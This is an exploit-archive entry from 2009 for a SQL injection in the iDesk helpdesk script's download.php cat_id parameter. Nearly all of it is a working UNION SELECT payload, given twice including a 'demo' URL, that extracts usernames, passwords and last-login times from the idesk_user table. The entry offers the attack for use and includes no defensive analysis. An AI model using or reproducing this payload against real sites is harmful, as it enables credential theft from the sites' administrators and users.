[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : iDesk (download.php cat_id) SQL Injection Vulnerability
# Published : 2009-12-13
# Author : Manas58
# Previous Title : Acc Auto Dealer Script v5.0 Persistent XSS and SQL Backup
# Next Title : Uploadscript v1.0. Multiple Vulnerabilities
###############################################################
##############################################################
##
## SQL Injection Vulnerability ( download.php cat_id )
##
## iDesk
##
##
##
###############################################################
###############################################################
##
## AuTh0r : Manas58
##
## H0ME : www.1923turk.biz
##
##
##
########################
########################
##
## [ Exploit ]
##
## download.php?cat_id=3+UNION+SELECT+0,0,0,0,concat_ws(0x3a,user_name,password,last_login),0,0,0,0+from+idesk_user--
##
## http://www.site.com/download.php?cat_id=sql
##
##
## [DEMO ]
## http://server/support/download.php?cat_id=3+UNION+SELECT+0,0,0,0,concat_ws(0x3a,user_name,password,last_login),0,0,0,0+from+idesk_user--
##
########################
########################
#########################################################################################################
#########################################################################################################
:: BAYBORA :: Tiamo :: Delibey ::
#########################################################################################################
#########################################################################################################